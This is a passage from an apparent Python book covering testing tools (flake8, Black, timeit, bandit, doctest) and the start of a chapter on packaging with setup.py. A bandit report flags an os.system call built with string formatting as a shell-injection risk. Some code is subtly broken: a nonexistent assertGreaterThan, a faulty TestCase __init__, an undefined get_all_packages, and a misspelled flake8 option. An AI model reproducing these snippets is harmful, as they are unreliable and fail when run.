The tests should successfully pass when run: . _____________________________________________________ Ran 1 test in 0.001s OK

Miscellaneous testing trivia

flake8 based passive linting

Linting tests your code for syntactical and conventional flaws, even before you proceed to run the unit tests. They usually follow the PEP8 specifications. One widely used linter used is flake8 which you can install from pip is as follows:

$ pip install flake8 The flake8 command can then be run from the terminal for a Python script, a module, or folder, and even a regex pattern.

$ flake8 myScript.py myScript.py:2:1: E305 expected 2 blank lines after class or function definition, found 1 myScript.py:22:1: E302 expected 2 blank lines, found 1 myScript.py:24:20: W292 no newline at end of file

A list of errors and warnings will be printed on the console indicating which section of the code has the error, the error type, and description.

You can configure flake8 on a project level as well as run it independently on the command line. If certain errors or warnings are expected in your project, then you can specify them for exclusion as rules in a configuration file. You can put the settings in a .flake8 file in your project directory or in the setup.cfg file. If

you have configured the project for using Tox, you can also place the flake8 configuration in your tox.ini file.

Consider the following example where we are skipping the __pycache__ and .git directories from checks. We also add a rule to ignore the E305 errors and exceed the max-line-length limit to 90.

[flake8] ignore = E305

exclude = __pycache__,.git max-line-length = 90

Alternatively, you can provide the following options on the command line:

$ flake8 --ignore E305 --exclude __pycache__,.git --max-linelength=90

The help option or the official documentation of flake8 can be referred to for the other important parameters. Flake8 can be added to Travis CI configuration directly with something like the following: matrix: include: - python: "3.7" script: "flake8"

When this is setup, Travis CI will pick up the rules you have defined in .flake8 config in the project folder, and if there are any flake8 failures encountered while linting, the build process will fail. Ensure that flake8 is added as a dependency for your project in the requirements.txt file.

Regular Linting also helps to indicate long term technical debt in your code. Sometimes while writing tests, we might copy paste a lot of code, which accumulates into an unmanageable codebase. In the future, when the code changes drastically, changing the tests might be quite an endeavor. Always remember the D.R.Y (Don’t Repeat Yourself) principle even while creating test suites.

More aggressive linting with code formatters

Passive linters are like colleagues who will review your code and find out all the mistakes for you to fix. Code formatters, on the other hand, are like that rare friend who will sit and fix the bugs in your code. Flake8 was a passive linter. Code Formatters like Black will help you to identify the errors in your code by linting, and then fix the errors for you to meet the standards and conventions that are widely accepted. Black is available for Python 3.6 and beyond, and is a strict code formatter, that is, you do not get any configuration options. However, the style set and conventions that Black follows is quite specific and generates beautifully formatted Pythonic code. You can simply add this to your test pipeline and let it work its magic on your scattered code every time before the code is tested.

Black is my personal preference as it quietly does its job without you even telling it how to. It is available to be installed from

$ pip install black

In order to run the formatter, simply call Black on the specific file or directory of files that need to be formatted.

$ black test.py

The code will be formatted in place and saved to the same files and directories.

Benchmark and performance testing the code

Python code can be benchmarked in several ways. A very common but useful way that is a part of the standard library in Python is using the timeit module. Fundamentally, this module can invoke your functions or methods a fixed number of times and generate stats and distributions for the execution time. Consider the following example, where a test method is defined and the timeit module is used to assess the performance. from timeit import timeit

def test_something(): # … your code to invoke the API # … assert something # … assert something else

if __name__ == '__main__': time = timeit("test_something()", setup="from __main__ import test_something", number=100 ) print(time) This will run the value in the setup script for 100 times as specified in the number parameter and calculate the estimated time for running the function.

The other more advanced option, if you are using pytest as your test runner, is to use the pytest-benchmark plugin. Here the benchmark is implemented in the form a test fixture. When you pass in any callable to the benchmark fixture, the time taken to execute the callable will also be logged with the results, once it is run by For benchmarking the performance, you can create a separate test and pass the test function or callable to it.

def test_performance(benchmark): result = benchmark(test_function) When you run pytest, the results of the benchmark will also be included in the console output:

Figure 10.4: Result of pytest for illustration

Assessing security flaws in your application

Apart from syntax and functionality tests, sometimes it is important to also check for security issues and vulnerabilities in your application. For this purpose, we suggest using the bandit module. It is a static analysis tool that can find common security issues in Python code. It is available in the Python Package Index and can be installed as follows:

$ pip install bandit It takes in the Python script as an argument on the command line (use the -r flag to run it recursively on your project folder), and it will scan and generate a report for various factors relating to the script. Consider the following example when we run bandit on a script that tries to run a bash command to compress the files:

$ bandit -r my_sum [main] INFO profile include tests: None [main] INFO profile exclude tests: None [main] INFO cli include tests: None [main] INFO cli exclude tests: None [main] INFO running on Python 3.7.4 [node_visitor] INFO Unable to find qualified name for module: testArchive.py Run started:2020-09-06 22:36:01.861150

Test results: >> Issue: [B605:start_process_with_a_shell] Starting a process with a shell, possible injection detected, security issue. Severity: High Confidence: High Location: archiveAndCleanup.py:56

More Info: https://bandit.readthedocs.io/en/latest/plugins/b605_start_process_wit h_a_shell.html

55     if os.path.isdir(folder_to_compress): 56         os.system( 57             "tar cf - {}".format(folder)) 58     else:

-------------------------------------------------Code scanned:

Total lines of code: 254 Total lines skipped (#nosec): 0 Run metrics: Total issues (by severity): Undefined: 0.0 Low: 0.0 Medium: 0.0 High: 1.0 Total issues (by confidence):

Undefined: 0.0 Low: 0.0 Medium: 0.0 High: 1.0 Files skipped (0):

Similar to how we configured we can also add a section to the setup.cfg file and include any such errors or warnings that you would want to ignore. It should look something like the following: [bandit] exclude: /test tests: B102,B302,B101

Best practices and guidelines for writing effective tests

Prefer using automated testing tools

Humans are inherently lazy. If the developers do not care about the code, it is easy to skip out on the addition of cases, or executing test runs after every change committed. Test Automation is becoming increasingly important and several suites have come up with support for automation. It is essential to choose one that suits your needs and learn how to use it properly.

The built-in unittest library is powerful and sufficient for most basic and repositories. It is quite a feature-rich and user-friendly framework for writing the tests which, in fact, was modeled after the popular Junit library for Java. Python’s standard library code heavily makes use of unittest and it is useful for reasonable complex projects as well. Unit test also supports the following:

Automatically discovering tests.

OOP based APIs for writing test suites and cases.

Simple CLI for execution and analysis.

Ability to choose or disable certain tests from the suite. Most production code bases are carved around version control system based repositories. Almost all of these systems support

some pre-procedures and post-procedures to be run before and after the commits. In git, they are referred to as hooks. It is a good idea to configure a git hook to run the tests before the code is committed or pushed to a shared repository.

Using doctest for single line tests

Python also comes with a doctest module where you can write small pieces of code within your source code and execute them later. It is a form of in-situ testing that can be localized to the unit that needs to be tested. The syntax of such tests look like lines in an interactive Python shell and are written in the Docstrings of the functions, methods, or classes.

Docstrings are not-exactly unit tests – they have a different purpose. They are minimal, less detailed, and do not handle external dependencies or regression bugs. They are primarily used as documentations for the different use cases of the module and sub-components that they are related to.

A function with doctest looks like the following:

def product(x, y): """Return the product of x & y.

>>> product(2, 4) 8 >>> product(-2, 2) -4

""" return x * y

if __name__ == '__main__': import doctest doctest.testmod()

However, doctests should be run automatically every time your complete test suite is run. When you are executing the preceding module from the command line, if any of the test calls in the Docstrings are behaving differently, the doctest module will complain.

Test-Driven Development (TDD) is a concept that is increasingly becoming important, given its effectiveness. Doctests are a recommended way to implement TDD in Python code. When you start writing a method, define the expected use cases as doctests with different inputs.

Segregate your test code from your application code

The worst idea you can have is to import your test code or test script in your application code. I know developers who write code in this manner and rely on test discovery tools to pick up the test while running. Although this might work, it leads to growing confusion as the code scales up. Another less common malpractice is to place the test invocation in the if __name__ == '__main__' section to invoke the tests when the module is called directly.

Writing libraries and their test classes in the same script or module may sound like you are writing modular code but it does not make for a scalable architecture.

Nothing justifies putting the application and test code in the same place. The ideal way is to follow the segregation in terms of modules as mentioned in the original directory structure for applications. The unittest module documentation outlines several reasons for isolating the tests from the code, which are as follows:

Tested code can be refactored more easily.

The test module can be run standalone from the command line.

The test code should be modified much less frequently than the code it tests.

The test code can more easily be separated from the shipped code.

Tests for modules written in C must be in separate modules anyway, so why not be consistent?

There is less temptation to change the test code to fit the code it tests without a good reason. If the testing strategy changes, there is no need to change the source code. Python was created meticulously with much time, energy, and love. As a rule of thumb, following the conventions outlined in the documentations is a definite way of making your code Pythonic.

Choose the right asserts in your tests

The Python unittest library has the unittest.TestCase class which predefines several useful assert methods that can be used. Some novice developers make use of the assertTrue in almost all the tests, which is not a Pythonic practice and is considered an antipattern. Using the right type of assertion not only makes the code clear for the readers, but also ensures handling of the unintended edge cases. The regular

class Test(unittest.TestCase): def __init__(self ): self.THLD = 10

def test_product(self ): self.assertTrue(product(12, 3) == 36)

def test_has_breached_threshold(self ): self.assertTrue(has_breached_threshold(12) > self.THLD)

def test_prime_factors(self ): self.assertTrue(prime_factors(7) is None)

The Pythonic

class Test(unittest.TestCase): def __init__(self ): self.THLD = 10

def test_product(self ): self.assertEqual(product(12, 3), 36)

def test_has_breached_threshold(self ): self.assertGreaterThan( has_breached_threshold(12), self.THLD )

def test_prime_factors(self ): self.assertIsNone(prime_factors(7))

Conclusion

Unlike earlier languages, where testing was a ton of effort, Python has made things quite simple. There are libraries and commandline utilities that you can use to ensure that your code behaves as it was designed to. It is not a complicated process, and there are well defined conventions and best practices that can ensuresthat you have a robust codebase. Unit test and Pytest come bundled with several useful features, tools, and APIs that can help you write maintainable, error-free, and validated production code. This is what we have tried to highlight in this chapter. I hope you have a bug-free future with Python.

We are almost at the end of the Pythonic journey. In the final chapter, we will be taking a look at the different ways that the Python software is packaged and shipped, and how you can create and maintain a robust and secure Python environment in production.

Key takeaways

Tests need to be deterministic in nature, that is, they should return the same results, regardless of how many times it is run.

Test cases should be modular, which means that the assertions in a test case should only be relevant to that test case.

The unittest framework in Python comes bundled with the setUp() and tearDown() methods which are automatically called before and after the tests respectively.

If the test has more side effects, it could be violating the Single Responsibility Principle, which says that your unit should implement a single functionality.

Sample test inputs are referred to as fixtures.

The parts of the application that are prone to side effects are more suitable for integration tests rather than unit tests.

Units Tests should preferably be run before every commit of a branch, whereas the Integration Tests are to be triggered before a release to production.

The responses package in the requests library helps to create the response fixtures to be persisted in the test folders.

Use tox for testing against multiple Python versions or multiple versions of a package.

If your code is Pythonic and makes use of magic methods or dunders, the MagicMock is the API you should choose for reliably testing your code.

Using Mocks also helps assess additional information like how many invocations were made to the API, what parameters were passed to it, or if the API was even invoked at all.

Regular linting also helps to indicate long term technical debt in your code.

It is a good idea to configure a git hook to run tests before code is committed or pushed to a shared repository.

Doctests are a recommended way to implement Test-Driven Development in Python code. Writing libraries and their test classes in the same script or module may sound like you are writing modular code, but it does not make for a scalable architecture.

Further reading

Harry J.W. Percival, Test Driven Development with Moshe Zadka, An Introduction to Mutation Testing in

CHAPTER 11 Production Code Management

“If you don’t innovate fast, disrupt your industry, disrupt yourself, you’ll be left behind.”

— John Chambers

Release management and process requirements follow a sort of similar pattern for every software development organization. However, the data scientist community takes a backseat when it comes to writing production quality code.

There is not a very clear demarcation between what is construed as production code and what isn’t. However, there are widely expected and followed conventions and best practices which help to make your code reliable and aesthetically manageable. One major difference to consider is that production code is accessed for reads and writes by way more people over time, as compared to simply the author. It is therefore very important that our production code has the following features:

Deterministic and reproducible, so that it can be consistently executed by multiple people.

Modular and has good documentation, so that it can be clearly read by multiple people.

You might have already encountered these challenges in modern software engineering. You can implement the same to tackle the challenges in Python and Data Science.

Figure 11.1: Features of Production Quality Code Writing effective production code is not rocket science. Do not underestimate your engineers or data scientists – they have seen it all. If someone possesses the ability to understand neural networks or implement a SVM vector they indeed can adhere to good coding practices.

Structure

The chapter will focus mainly upon the following areas: Packaging Python code

Distributable code best practices

Using virtual environments in production Garbage collection

Application security and cryptography

Python code profiling

Understanding GIL and multiprocessing

Objectives

The tools, techniques, and concepts that we will be discussing will help you improve the quality of your work in Python, and also help you ship more robust code for a production environment. At the end of this chapter, you will be able to do the following:

Create a distributable Python application. Understand how memory is managed in Python applications.

Learn how to secure your application code.

Profile your code for performance bottlenecks.

Packaging Python code

When you set out to write modular code, reusability of code is the prime focus. It helps you share the work of multiple developers in order to create new applications or APIs. The organization of code is improved and every part of it can be maintained separately. For Python code, writing modular code helps to bring it to a format that can be easily packaged. In this section, we will be taking a look at how we can package the code you write, so that it can be shared with other users for installation and usage.

Structure of a Python package

Every file you create that ends with a .py extension is considered a module. The module can store definitions of variables, functions, or classes in it. When one or more such modules are put inside a folder, and a special file called __init__.py is added to it, a package is created, which shares the same name as that of the folder. The very commonly used package structure in Python looks like the following: parent/                 # Top-level Package __init__.py         # Initialize the package one/                # Subpackage one __init__.py libfile1.py libfile2.py … two/                # Subpackage two __init__.py utilfiles1.py utilfiles2.py … three/              # Subpackage three __init__.py script1.py script2.py …

Configuring a package

We have now organized our source code files into a package. Let’s now discuss how we can configure the package with specific behaviour and properties. For doing this, we need to make use of a special configuration file called All configuration parameters and metadata about the package need to be placed in this file. An example of a setup.py file would look like the following:

from setuptools import setup, find_packages setup( name='codebase', version='1.0.1', description='Programming Interview Questions', long_description='Not kidding, you will find everything here.', classifiers=[ 'License :: OSI Approved :: MIT License', 'Programming Language :: Python :: 3.6', ],

keywords='interview programming questions python', url='http://github.com/sonal-raj/codebase', author='Sonal Raj', author_email='[email protected]', license='MIT', packages=get_all_packages(),

install_requires=[ 'markdown', 'pandas', ],

include_package_data=True,

zip_safe=False )

Specifying dependencies

To ensure that the package is directly operational after its installation, you need to configure it to install all the other libraries and packages that it depends upon. The install_requires parameter in the function is used to specify the name and optionally the version of the dependency to be installed.

install_requires=['pandas==1.0', 'matplotlib>=1,